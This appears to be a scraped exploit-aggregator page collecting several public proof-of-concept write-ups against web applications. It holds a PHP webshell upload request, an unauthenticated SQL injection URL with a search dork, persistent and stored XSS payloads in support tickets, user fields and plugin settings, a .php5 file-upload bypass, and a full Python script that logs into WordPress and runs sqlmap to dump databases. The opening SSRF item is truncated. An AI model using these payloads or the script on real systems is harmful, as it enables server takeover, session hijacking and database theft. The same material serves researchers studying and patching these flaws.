PHP/7.0.33-0+deb9u9 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5694 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5694.php 26.10.2021 -- POST /php/query.php HTTP/1.1 Host: 192.168.1.222 Content-Length: 29 Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://192.168.1.222 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://192.168.1.222/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close ip=www.columbia.edu:80&argu=/ HTTP/1.1 302 Found Date: Tue, 14 Dec 2021 20:26:47 GMT Server: Apache/2.4.41 (Ubuntu) Set-Cookie: PHPSESSID=gktecb9mjv4gp1moo7bg3oovs3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: ../login.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 32141 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <!-- developed by CUIT --> <!-- 08/28/18, 8:55:54am --><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" > <meta name="msvalidate.01" content="DB472D6D4C7DB1E74C6D939F9C8AA8B4" /> <title>Columbia University in the City of New York</title> ... ...
HireHackking

Simple Chatbot Application 1.0 - Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title: Simple Chatbot Application 1.0 - Remote Code Execution (RCE) # Date: 18/01/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html # Version: 1.0 # Tested on: XAMPP, Windows 10 # Exploit : You can upload a php shell file as a bot_avatar or user_avatar or image # ------------------------------------------------------------------------------------------ # POC # ------------------------------------------------------------------------------------------ # Request sent as base user POST /classes/SystemSettings.php?f=update_settings HTTP/1.1 Host: localhost.SA Cookie: PHPSESSID=vgs6dm14ubfcmbi4kvgod1jeb4; _ga=GA1.2.1002000635.1642463002; _gid=GA1.2.990020096.1642463002 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------55217074722533208072616276474 Content-Length: 1121 Connection: close -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="name" -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="short_name" -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="intro" -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="no_result" -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="img"; filename="" Content-Type: image/jpeg -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="bot_avatar"; filename="bot_avatar.php" Content-Type: application/octet-stream <?php if($_REQUEST['s']) { system($_REQUEST['s']); } else phpinfo(); ?> </pre> </body> </html> -----------------------------55217074722533208072616276474 Content-Disposition: form-data; name="user_avatar"; filename="" Content-Type: application/octet-stream -----------------------------55217074722533208072616276474-- # Response HTTP/1.1 200 OK Date: Tue, 18 Jan 2022 00:51:29 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12 X-Powered-By: PHP/8.0.12 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 119 Connection: close Content-Type: text/html; charset=UTF-8 1 # ------------------------------------------------------------------------------------------ # Request to webshell # ------------------------------------------------------------------------------------------ GET /uploads/bot_avatar.php?s=echo+0xSaudi HTTP/1.1 Host: localhost.SA Cookie: PHPSESSID=vgs6dm14ubfcmbi4kvgod1jeb4; _ga=GA1.2.1002000635.1642463002; _gid=GA1.2.990020096.1642463002 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Connection: close # ------------------------------------------------------------------------------------------ # Webshell response # ------------------------------------------------------------------------------------------ HTTP/1.1 200 OK Date: Tue, 18 Jan 2022 00:51:29 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12 X-Powered-By: PHP/8.0.12 Content-Length: 16 Connection: close Content-Type: text/html; charset=UTF-8 <pre>0xSaudi </pre>
HireHackking

Nyron 1.0 - SQLi (Unauthenticated)

HACKER · %s · %s

# Exploit Title: Nyron 1.0 - SQLi (Unauthenticated) # Google Dork: inurl:"winlib.aspx" # Date: 01/18/2021 # Exploit Author: Miguel Santareno # Vendor Homepage: http://www.wecul.pt/ # Software Link: http://www.wecul.pt/solucoes/bibliotecas/ # Version: < 1.0 # Tested on: windows # 1. Description Unauthenticated user can exploit SQL Injection vulnerability in thes1 parameter. # 2. Proof of Concept (PoC) https://vulnerable_webiste.com/Nyron/Library/Catalog/winlibsrch.aspx?skey=C8AF11631DCA40ADA6DE4C2E323B9989&pag=1&tpp=12&sort=4&cap=&pesq=5&thes1='"> # 3. Research: https://miguelsantareno.github.io/edp.pdf
HireHackking

Rocket LMS 1.1 - Persistent Cross Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Rocket LMS 1.1 - Persistent Cross Site Scripting (XSS) # Exploit Author: Vulnerability-Lab # Date: 29/12/2021 Document Title: =============== Rocket LMS 1.1 - Persistent Cross Site Scripting (XSS) References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2305 Release Date: ============= 2021-12-29 Vulnerability Laboratory ID (VL-ID): ==================================== 2305 Common Vulnerability Scoring System: ==================================== 5.4 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Rocket LMS is an online course marketplace with a pile of features that helps you to run your online education business easily. This product helps instructors and students to get in touch together and share knowledge. Instructors will be able to create unlimited video courses, live classes, text courses, projects, quizzes, files, etc and students will be able to use the educational material and increase their skill level. Rocket LMS is based on real business needs, cultural differences, advanced user researches so the product covers your business requirements efficiently. (Copy of the Homepage:https://lms.rocket-soft.org/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent cross site scripting web vulnerability in the Rocket LMS v1.1 cms. Affected Product(s): ==================== Rocketsoft Product: Rocket LMS v1.1 - eLearning Platform CMS (Web-Application) Vulnerability Disclosure Timeline: ================================== 2021-09-03: Researcher Notification & Coordination (Security Researcher) 2021-09-04: Vendor Notification (Security Department) 2021-**-**: Vendor Response/Feedback (Security Department) 2021-**-**: Vendor Fix/Patch (Service Developer Team) 2021-**-**: Security Acknowledgements (Security Department) 2021-12-29: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (User Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official Rocket LMS v1.1 cms web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The vulnerability is located in the support ticket message body. The message body does not sanitize the input of message. Remote attackers with low privileged application user accounts are able to inject own malicious script code with persistent attack vector. The request method to inject is post. After the inject the message a displayed again for the user and the backend for the support (admin). The issue can be exploited by organization, student and instructor account roles. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] conversations Support - New Ticket Vulnerable Input(s): [+] Subject Vulnerable Parameter(s): [+] title Affected Module(s): [+] Messages History Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. PoC: Payload <img src="evil.source" onload="alert(document.domain)"></img> --- PoC Session Logs (POST) --- https://lms.rocket-soft.org/panel/support/store Host: lms.rocket-soft.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded Content-Length: 271 Origin:https://lms.rocket-soft.org Connection: keep-alive Referer:https://lms.rocket-soft.org/panel/support/new Cookie: webinar_session=eyJpdiI6ImNUeG9hcmFEbXFUSGxZd0NOZ3J6R0E9PSIsInZhbHVlIjoiWXFSOGRXYWFHcUUvc0VuNUpzanhBZjdBc21lRy8xaEhTU0hQTnk2YWlJM1ZHYkxXdzc3 T3U2Nm9yMEI3b2o2QmtCT2NjdEkyRVNwdlhWUjgwY0ZHWkNyVHJSdnBCck8vVWo4MFVsK2JvLzRDUm1BRm5zU2Y0SWZWdGR1b29keWwiLCJtYWMiOiIxODI3NDQ2OTcxZDMwNjA0M2U0 OGM3YzZmNmMzM2Y1OTk5ZTNiZTIzY2E2ZGQxMTlkYzY2YzY0Y2M5OTI5MTc5In0%3D; TawkConnectionTime=0; __tawkuuid=e::lms.rocket-soft.org::W9t6jOO76CukDtw wAughTc4sTzqsd2xAqZJpiyabjsp3sI9le/SuCBxWz7ekNzR0::2; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6Ik9iUEZFNlZBYjJSOEVjSE1hRlNiZFE9PSIsInZhbHVlIjoiR3F1RWFsb01KREQ2K05FaG5MT1hST1 pYNmx3Z3ZoU2lDOXBQL3h3aVg0T2k2a1YwVDZYR25nUnNCOXhsWjZnWjcrQTJxUzhEa3k2N1VEdjZkZGJFMXg3Q0pIWGx6VUZwajJGc09DdUlzaFpwb0t2SHJoaHkvQmh3bTJPM0RlWVh SRGszUlRqUVJNdlErMXpXYU5hZWlySWVrMktwZmp4RzNMSXV2TnAzTlFpQUhRalNKSmw2elhzVURqWVpqQlpkajAvUzBPcTV0Z0tXaFRFNkpmLy94TkFxa3dxdjlnOWk4VWpSRzMzeUVa UT0iLCJtYWMiOiJkMmQ3ZTk4NzllOTQ3ZTU4ZGRjMTljMjlkMzRkODhjMmI0Mzk5MjM1ZmJlYTc1NTAxYzI2OGI3YmMwMDczMmQxIn0%3D _token=3CmMP45TwUNoeNVPzZ4JuGunKoFqcUxbDWliz9rg&title=test1"><img src="evil.source" onload=alert(document.domain)></img>&type=course_support&webinar_id=1996&message=test2&attach= - POST: HTTP/1.1 302 Found Server: Apache/2 X-Powered-By: PHP/7.4.20 Location:https://lms.rocket-soft.org/panel/support Set-Cookie: webinar_session=eyJpdiI6Im5OVER1cno1OXJmQnRRb3QycHExN1E9PSIsInZhbHVlIjoiOGxXdHV5em95bGh0ejh3MXlRT3dwSXFGcUZzSmMzbHlJd2xFRDhweEFBS25JeFFrMzF2Wn lLdHc0MUpFQmN1cDY3SUE1V0hwVGRDUGZvRkRYZVYvY01BZ2NxT1NJWThXQnRiNnR3SDJ4TEZ5Q3BQUnZhR1lxUHZnR2hhLzEzSysiLCJtYWMiOiI1YjBlMmVjMjYwYjEzODVhZTJmZWZj YTlmMGJjMThkYzQ0ZjVmNjI0NTA1MGMxM2Q3ZGVlYjlhOGJkZTY3NmM0In0%3D; Max-Age=7200; path=/; httponly; samesite=lax Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Access-Control-Allow-Origin: * Access-Control-Allow-Headers: origin, x-requested-with, content-type Access-Control-Allow-Methods: PUT, GET, POST, DELETE, OPTIONS Content-Length: 210 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Vulnerable Source: conversations Support - New Ticket - Messages History <div class="rounded-sm mt-15 border panel-shadow p-15"> <div class="d-flex align-items-center justify-content-between pb-20 border-bottom border-gray300"> <div class="user-inline-avatar d-flex align-items-center"> <div class="avatar"> <img src="/store/995/60dce9eb4290c.png" class="img-cover" alt=""> </div> <div class="ml-10"> <span class="d-block text-dark-blue font-14 font-weight-500">Cameron Schofield</span> <span class="mt-1 font-12 text-gray d-block">user</span> </div></div> <div class="d-flex flex-column align-items-end"> <span class="font-12 text-gray">2021 Sep 9 | 12:58</span> </div></div> <p class="text-gray mt-15 font-weight-500 font-14">"<img src="evil.source" onload="alert(document.domain)"></img></p> </div> Reference(s): https://lms.rocket-soft.org/ https://lms.rocket-soft.org/panel/ https://lms.rocket-soft.org/panel/support https://lms.rocket-soft.org/panel/support/new https://lms.rocket-soft.org/panel/support/[id]/conversations Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
HireHackking
# Exploit Title: Landa Driving School Management System 2.0.1 - Arbitrary File Upload # Version 2.0.1 # Google Dork: N/A # Date: 17/01/2022 # Exploit Author: Sohel Yousef - sohel.yousef@yandex.com # Software Link: https://codecanyon.net/item/landa-driving-school-management-system/23220151 Landa Driving School Management System contain arbitrary file upload registered user can upload .php5 files in attachments section with use of intercept tool in burbsuite to edit the raw details POST /profile/attachment/upload/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: */* Accept-Language: ar,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------215084716322124620333137564048 Content-Length: 294983 Origin: https://localhost Connection: close Referer: https://localhost/profile/91/ Cookie: CSRF-TOKEN=e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf; simcify=97a4436a6f7c5c5cd1fc43b903e3b760 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------215084716322124620333137564048 Content-Disposition: form-data; name="name" sddd -----------------------------215084716322124620333137564048 Content-Disposition: form-data; name="csrf-token" e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf -----------------------------215084716322124620333137564048 Content-Disposition: form-data; name="userid" 91 -----------------------------215084716322124620333137564048 Content-Disposition: form-data; name="attachment"; filename="w.php.png" >>>>>>>>>>>>>>>> change this to w.php5 Content-Type: image/png you will have a direct link to the uploaded files
HireHackking
# Exploit Title: Online Project Time Management System 1.0 - Multiple Stored XSS (Authenticated) # Date: 19/01/2022 # Exploit Author: Felipe Alcantara (Filiplain) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: Kali Linux # Description: Stored XSS in multiple fields... # Steps to reproduce (with employee Access) # Log in as an employee # Go to : http://localhost/ptms/?page=user # Add XSS payload to any field of the user's name. #Click Update ================= POST /ptms/classes/Users.php?f=save_employee HTTP/1.1 Host: localhost Content-Length: 1339 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvsLkAfaBC64Uzoak Origin: http://localhost Referer: http://localhost/ptms/?page=user Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm Connection: close ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="id" 4 ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="code" 2022-0003 ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="generated_password" ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="firstname" Mark ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="middlename" <script>alert("XSS_TEST")</script> ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="lastname" Cooper ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="gender" Male ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="department" IT Department ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="position" Department Manager ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="email" mcooper@sample.com ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="password" ------WebKitFormBoundaryvsLkAfaBC64Uzoak Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryvsLkAfaBC64Uzoak-- ================= ----------------------------------------------------------------------------- # Steps to reproduce (with Admin access) # Log in to the admin panel # Go to : http://localhost/ptms/admin/?page=system_info # Add XSS payload to the 'System Name' field #Click Update ================= POST /ptms/classes/SystemSettings.php?f=update_settings HTTP/1.1 Host: localhost Content-Length: 603 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCibB6pEzThjb4Zcq Origin: http://localhost Referer: http://localhost/ptms/admin/?page=system_info Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm Connection: close ------WebKitFormBoundaryCibB6pEzThjb4Zcq Content-Disposition: form-data; name="name" Online Project Time Management System - PHP <script>alert("XSS")</script> ------WebKitFormBoundaryCibB6pEzThjb4Zcq Content-Disposition: form-data; name="short_name" PTMS - PHP ------WebKitFormBoundaryCibB6pEzThjb4Zcq Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryCibB6pEzThjb4Zcq Content-Disposition: form-data; name="cover"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryCibB6pEzThjb4Zcq-- =================
HireHackking
# Exploit Title: WordPress Plugin Mortgage Calculators WP 1.52 - Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 25-10-2021 # Exploit Author: Ceylan Bozogullarindan # Vendor Homepage: https://lenderd.com/ # Software Link: https://mortgagecalculatorsplugin.com/ # Version: 1.52 # Tested on: Linux # CVE : CVE-2021-24904 (https://wpscan.com/vulnerability/7b80f89b-e724-41c5-aa03-21d1eef50f21) # Description: The plugin gives users real-time estimates by providing mortgage calculators. It does not implement any sanitisation on the color value of the background of a calculator in admin panel, which could lead to authenticated Stored Cross-Site Scripting issues. An attacker can execute malicious javascript codes for all visitors of a page containing the calculator. # Steps To Reproduce: 1. Go to settings page available under the "Calculator" menu item. 2. Click the "Select Color" button and type the following payload the input space: `hacked</style></head><script>alert(1)</script>` 3. Click the "Save Changes" button to save settings. 4. Create a new page and add the shortcode ([mcwp type="cv"]) of the calculator, for testing. 5. Visit the page to trigger XSS.
HireHackking
# Exploit Title: WordPress Plugin RegistrationMagic V 5.0.1.5 - SQL Injection (Authenticated) # Date 23.01.2022 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://registrationmagic.com/ # Software Link: https://downloads.wordpress.org/plugin/custom-registration-form-builder-with-submission-manager.5.0.1.5.zip # Version: <= 5.0.1.5 # Tested on: Ubuntu 20.04 # CVE: CVE-2021-24862 # CWE: CWE-89 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24862/README.md ''' Description: The RegistrationMagic WordPress plugin before 5.0.1.6 does not escape user input in its rm_chronos_ajax AJAX action before using it in a SQL statement when duplicating tasks in batches, which could lead to a SQL injection issue. ''' # Banner: import os banner = ''' _____ _____ _____ ___ ___ ___ ___ ___ ___ ___ ___ ___ | | | | __|___|_ | |_ |_ | ___|_ | | | . | _|_ | | --| | | __|___| _| | | _|_| |_|___| _|_ | . | . | _| |_____|\___/|_____| |___|___|___|_____| |___| |_|___|___|___| [+] RegistrationMagic SQL Injection [@] Developed by Ron Jost (Hacker5preme) ''' print(banner) import string import argparse import requests from datetime import datetime import random import json import subprocess # User-Input: my_parser = argparse.ArgumentParser(description='Wordpress Plugin RegistrationMagic - SQL Injection') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH username = args.USERNAME password = args.PASSWORD print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) # Authentication: session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' check = session.get(auth_url) # Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } auth = session.post(auth_url, headers=header, data=body) # Create task to ensure duplicate: dupl_url = "http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=rm_ex_chronos_edit_task&rm_form_id=2' # Header: header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://" + target_ip + ':' + target_port + "/wp-admin/admin.php?page=rm_ex_chronos_edit_task&rm_form_id=2", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://" + target_ip, "Connection": "close", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1" } # Body body = { "rmc-task-edit-form-subbed": "yes", "rm-task-slide": "on", "rmc_task_name": "Exploitdevelopmenthack" + ''.join(random.choice(string.ascii_letters) for x in range(12)), "rmc_task_description": "fiasfdhb", "rmc_rule_sub_time_older_than_age": '', "rmc_rule_sub_time_younger_than_age": '', "rmc_rule_fv_fids[]": '', "rmc_rule_fv_fvals[]": '', "rmc_rule_pay_status[]": "pending", "rmc_rule_pay_status[]": "canceled", "rmc_action_user_acc": "do_nothing", "rmc_action_send_mail_sub": '', "rmc_action_send_mail_body": '' } # Create project a = session.post(dupl_url, headers=header, data=body) # SQL-Injection (Exploit): exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php' # Generate payload for sqlmap print ('[+] Payload for sqlmap exploitation:') cookies_session = session.cookies.get_dict() cookie = json.dumps(cookies_session) cookie = cookie.replace('"}','') cookie = cookie.replace('{"', '') cookie = cookie.replace('"', '') cookie = cookie.replace(" ", '') cookie = cookie.replace(":", '=') cookie = cookie.replace(',', '; ') exploitcode_url = "sqlmap -u http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php' exploitcode_risk = ' --level 2 --risk 2 --data="action=rm_chronos_ajax&rm_chronos_ajax_action=duplicate_tasks_batch&task_ids%5B%5D=2"' exploitcode_cookie = ' --cookie="' + cookie + '"' print(' Sqlmap options:') print(' -a, --all Retrieve everything') print(' -b, --banner Retrieve DBMS banner') print(' --current-user Retrieve DBMS current user') print(' --current-db Retrieve DBMS current database') print(' --passwords Enumerate DBMS users password hashes') print(' --tables Enumerate DBMS database tables') print(' --columns Enumerate DBMS database table column') print(' --schema Enumerate DBMS schema') print(' --dump Dump DBMS database table entries') print(' --dump-all Dump all DBMS databases tables entries') retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + ' ' + retrieve_mode + ' -p task_ids[] -v 0' os.system(exploitcode) print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))